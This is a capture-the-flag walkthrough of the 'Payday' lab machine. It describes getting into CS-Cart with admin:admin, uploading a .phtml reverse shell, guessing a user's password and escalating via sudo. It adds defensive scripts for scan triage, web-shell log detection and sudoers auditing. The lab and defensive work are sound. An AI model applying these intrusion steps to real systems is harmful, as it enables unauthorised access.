linuxPayDay

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.222.39
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 20:34 +03
Nmap scan report for 192.168.222.39
Host is up, received echo-reply ttl 61 (0.14s latency).
Scanned at 2025-10-02 20:34:45 +03 for 205s
Not shown: 65527 closed tcp ports (reset)
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 61 OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAJedhI7AqO17xYjoo1RT33T4x4g7b+u71OK2CNJW//eoNBEibTyvqAmBDobETDcAZXHMdEMTvINlM7ZjGV4EAhfE57Fkkhae8LvML3Ae0OVsa/l4pWizwGEEkHVujayyHZlwqXnK1ePV9rKnc6VJUYL4yHPMEwhNDme92hxlEWBbAAAAFQCyn5tJyWy2EZXJLQgS/xpiBH36uQAAAIBcUdaW5kLYjbgbalp1Z3cMQuuiG/YhaLxNBMh75vM/SrrsATeqEIUlBNBgDel+fUSPbr2iCQ+I8xrk6CNvcXtugMfJSF78pH42VN5GrLKzNZeoyGzywEhcFKHAqcRMntyEZJ/BiLWRunRcnKznMMa00/d3xRLvTFKUmUjdW1IebAAAAIBRhyvDlRI873HIhNd8GiXY/kZyL+jDQle8ULF1Lk+H+EzKXMSPt0gMv8z2bpSD1XIB565rcFWlO+7q0BZFY+NLJAhMWAWxBE4Ib87uPUqeGvg6D8w6gZur84lpMg7P1KjyihIfY5tMCwfKkkaS418IPzhKtDUvtI0Vr6h3Wv0luA==
|   2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzGacK6NGRpMIVjkA/xYbfKDgeJeQzkJl25og4nQl+FV4ZbvXv6h0vCU+E8SPHKPL/WJAIqmL6hdQaTQiTDmhcKjecWBq9fX1Esb8cvlOPEzphl+wESfJx/lWYvLPBXz0ZdKfy2/O+0an9ua6jl3tDEFzeosHwIF8zDbaBL6/RzBV+0gkzA67OowtcaxoioYYPzsEaOAkAFjlaRMviUA3nzCvffG61KyqmAdwodl+rXyI4KHjQqinPYk5qmj9rO8LcLE/gWVRoRw4va6hbJ2V7e74Tt1HQ4V/FzhG1zrWdkI/qA65RMCw/0270w1PjYkfYl2ENJL6YHHosf4NCkfdbw==
80/tcp  open  http        syn-ack ttl 61 Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
110/tcp open  pop3        syn-ack ttl 61 Dovecot pop3d
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
|_pop3-capabilities: RESP-CODES STLS TOP UIDL PIPELINING CAPA SASL
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
139/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        syn-ack ttl 61 Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
|_imap-capabilities: completed THREAD=REFERENCES IDLE LITERAL+ OK IMAP4rev1 STARTTLS Capability LOGINDISABLEDA0001 UNSELECT NAMESPACE LOGIN-REFERRALS SORT SASL-IR MULTIAPPEND CHILDREN
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
445/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imap    syn-ack ttl 61 Dovecot imapd
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_imap-capabilities: THREAD=REFERENCES IDLE LITERAL+ AUTH=PLAINA0001 IMAP4rev1 completed Capability OK UNSELECT NAMESPACE LOGIN-REFERRALS SORT SASL-IR MULTIAPPEND CHILDREN
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
995/tcp open  ssl/pop3    syn-ack ttl 61 Dovecot pop3d
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_pop3-capabilities: RESP-CODES TOP UIDL USER PIPELINING CAPA SASL(PLAIN)
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
|_-----END CERTIFICATE-----
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
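The scan above already contains several hygiene findings worth pulling out automatically: SSLv2 offered on every TLS port, a 1024-bit RSA certificate signed with SHA-1 that expired in 2008, plus OpenSSH 4.6 and Apache 2.2.4. The Python script below is an added example, not part of the original writeup: it reads the XML that -oA writes next to the .nmap file and flags those conditions. The embedded XML sample is constructed to mirror the output above, the version floors in LEGACY_FLOORS are an assumed baseline, and the script matches on the text in each script's `output` attribute (the same text nmap prints), so it does not depend on nmap's structured element layout.

```python
"""Triage an nmap XML report for legacy crypto and service hygiene findings."""
import re
import sys
import xml.etree.ElementTree as ET
from datetime import datetime

# Constructed sample in nmap's XML layout, reduced to the parts this script
# reads; the values mirror the scan output shown above.
SAMPLE_XML = """<nmaprun scanner="nmap">
<host><address addr="192.168.222.39" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
<service name="ssh" product="OpenSSH" version="4.6p1 Debian 5build1"/>
</port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
<service name="http" product="Apache httpd" version="2.2.4"/>
</port>
<port protocol="tcp" portid="110"><state state="open" reason="syn-ack"/>
<service name="pop3" product="Dovecot pop3d"/>
<script id="ssl-cert" output="Subject: commonName=ubuntu01
Public Key type: rsa
Public Key bits: 1024
Signature Algorithm: sha1WithRSAEncryption
Not valid before: 2008-04-25T02:02:48
Not valid after:  2008-05-25T02:02:48"/>
<script id="sslv2" output="
  SSLv2 supported
  ciphers:
    SSL2_RC4_128_WITH_MD5"/>
</port>
</ports></host></nmaprun>
"""

# Assumed baseline: any product below this major.minor is reported as legacy.
LEGACY_FLOORS = {"Apache httpd": (2, 4), "OpenSSH": (7, 0)}


def _version_tuple(version):
    """'4.6p1 Debian 5build1' -> (4, 6); None when no leading number."""
    m = re.match(r"(\d+)\.(\d+)", version or "")
    return (int(m.group(1)), int(m.group(2))) if m else None


def triage(xml_text, now=None):
    """Return a list of (address, port, finding) tuples for open ports."""
    now = now or datetime.now()
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            pid = port.get("portid")
            svc = port.find("service")
            if svc is not None:
                product, version = svc.get("product", ""), svc.get("version", "")
                floor, seen = LEGACY_FLOORS.get(product), _version_tuple(version)
                if floor and seen and seen < floor:
                    findings.append((addr, pid, f"legacy {product} {version} (below {floor[0]}.{floor[1]})"))
            for script in port.findall("script"):
                out = script.get("output", "")
                if script.get("id") == "sslv2" and "SSLv2 supported" in out:
                    findings.append((addr, pid, "SSLv2 enabled"))
                if script.get("id") == "ssl-cert":
                    m = re.search(r"Public Key bits:\s*(\d+)", out)
                    if m and int(m.group(1)) < 2048:
                        findings.append((addr, pid, f"weak RSA key: {m.group(1)} bits"))
                    if "sha1With" in out:
                        findings.append((addr, pid, "certificate signed with SHA-1"))
                    m = re.search(r"Not valid after:\s*(\S+)", out)
                    if m:
                        expiry = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S")
                        if expiry < now:
                            findings.append((addr, pid, f"certificate expired {expiry.date()}"))
    return findings


if __name__ == "__main__":
    # Pass the real nmap/services.xml as argv[1]; falls back to the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for addr, pid, msg in triage(text):
        print(f"{addr}:{pid}  {msg}")
```

Run against the sample it prints six lines; the interesting ones on a real engagement are the certificate and SSLv2 rows on 110, 143, 993 and 995, which together say the mail stack has not been touched since 2008.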

HTTP (80):

I will start with port 80 by running gobuster:

We will find some interesting files and directories.

Explore the website:

We will see it is running the CS-Cart shopping cart software.

The skins directory has directory listing enabled, and the server is also misconfigured to reveal the underlying operating system and the web server version:

We can find the exact version of the application by navigating to install.php:

Or by checking the most recent year in the copyright notice:

Exploitation:

One of the vulnerabilities affecting this version is an authenticated RCE; let's check it out:

As stated in one of the GitHub comments:

  1. Visit "cs-cart" /admin.php and login (Remember: You need to login on ADMIN section not on the regular USER section).

  2. Under Look and Feel section click on "template editor".

  3. And under that section, upload your malicious .php file, make sure you rename it to .phtml before you upload.

  4. If successful, you should be able to get an RCE.

We can try a few default credential combinations, such as admin:admin, or search online for the default credentials for CS-Cart.

admin:admin worked for me:

Then we will click on Template editor under Look and Feel:

We will upload a PHP reverse shell, but first edit it to set our own IP address and port, and change its extension to .phtml as mentioned in the GitHub comment:

Press the Browse button, select the file, and click Upload:

As we can see, it is uploaded under the /skins/ directory that we discovered earlier with gobuster.

Before opening it, we will start a netcat listener:

Click on shell.phtml:
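From the defender's side, the sequence just walked through (admin login, upload through the template editor, then a request for a script file under /skins/) leaves a recognisable trace in the web server's access log. The Python below is an added example, not from the original writeup, that runs that detection over a few constructed Apache combined-format log lines; the client addresses, timestamps and the /skins/shell.phtml path are made up, and the CONTENT_DIRS list of directories that should never serve executable scripts is an assumption to adjust per deployment.

```python
"""Flag requests that execute a script from a content directory (here CS-Cart's
/skins/), and note whether the same client had just been POSTing to admin.php."""
import re
from collections import defaultdict

# Constructed sample log lines (not taken from the target). The fourth line is
# the pattern to catch: a .phtml under /skins/ fetched right after admin POSTs.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Oct/2025:20:40:01 +0300] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [02/Oct/2025:20:41:10 +0300] "POST /admin.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [02/Oct/2025:20:42:33 +0300] "POST /admin.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.9 - - [02/Oct/2025:20:43:05 +0300] "GET /skins/shell.phtml HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.5 - - [02/Oct/2025:20:44:00 +0300] "GET /skins/basic/customer/styles.css HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, identd, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
# Extensions the PHP handler will execute; .phtml is the one used above.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|phps)(\?|$)", re.IGNORECASE)
# Assumed list of static-content roots that must never serve scripts.
CONTENT_DIRS = ("/skins/", "/images/", "/uploads/")


def parse(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text):
    """Return (client, path, status, context) for each script request under CONTENT_DIRS."""
    alerts = []
    admin_posts = defaultdict(list)  # client address -> timestamps of POST /admin.php
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].startswith("/admin.php"):
            admin_posts[rec["ip"]].append(rec["ts"])
        if rec["path"].startswith(CONTENT_DIRS) and SCRIPT_EXT.search(rec["path"]):
            prior = admin_posts[rec["ip"]]
            context = (f"after {len(prior)} admin.php POST(s) from same IP"
                       if prior else "no prior admin activity from this IP")
            alerts.append((rec["ip"], rec["path"], rec["status"], context))
    return alerts


if __name__ == "__main__":
    for ip, path, status, context in detect(SAMPLE_LOG):
        print(f"ALERT {ip} {path} -> {status} ({context})")
```

The context field separates a script request that follows admin.php POSTs from the same address from one with no admin activity at all; both deserve a look, since the first suggests a compromised or default admin account and the second a file that was already there. The durable fix is to stop the web server executing scripts from the skins directory and to turn off directory indexes there, which removes this RCE path whatever the admin password is.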

Lateral Movement to patrick:

After some local enumeration, we will find there is a user called patrick on the machine:

I will try the username as the password:

We are patrick.

Alternatively, we could brute-force the password with tools such as hydra, medusa, or ncrack.

Privilege Escalation:

Let's check whether patrick can run any commands with sudo:

So patrick can run any command with sudo, which lets us su to root:
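The escalation works because patrick's sudoers entry grants every command. The Python below is an added example, not from the original writeup, that audits a sudoers file for exactly that kind of grant; the sample sudoers text is constructed (patrick's line reproduces the effect described above, the other entries are typical noise), and the high/medium labels are the script's own convention.

```python
"""Audit sudoers rules for unrestricted or passwordless grants to non-root users."""
import re
import sys

# Constructed sample sudoers content (not copied from the target).
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults        env_reset
root    ALL=(ALL) ALL
patrick ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
www-data ALL=(ALL) NOPASSWD: ALL
"""

# user_or_group  hosts = (runas) TAG: commands   -- Defaults/aliases do not match.
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def audit(text):
    """Return (who, severity, message) for every risky rule granted to someone other than root."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drops comments; #include lines are not followed
        m = RULE_RE.match(line) if line else None
        if not m or m.group("who") == "root":
            continue
        who = m.group("who")
        runas = m.group("runas") or "root"  # sudoers default when no (runas) is given
        cmds = m.group("cmds").strip()
        nopasswd = "NOPASSWD" in m.group("tags")
        if cmds == "ALL" or cmds.startswith("ALL,"):
            msg = f"any command as ({runas})"
            if nopasswd:
                msg += ", no password required"
            findings.append((who, "high", msg))
        elif nopasswd:
            findings.append((who, "medium", f"passwordless {cmds} as ({runas})"))
    return findings


if __name__ == "__main__":
    # Pass a sudoers file (or a visudo -c -f target) as argv[1]; falls back to the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SUDOERS
    for who, severity, msg in audit(text):
        print(f"{severity:6} {who:10} {msg}")
```

On this machine the patrick row is the whole privilege escalation: a web-shell foothold plus a password equal to the username plus an "any command" grant is three separate findings, and removing any one of them breaks the chain.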

Get the flags:
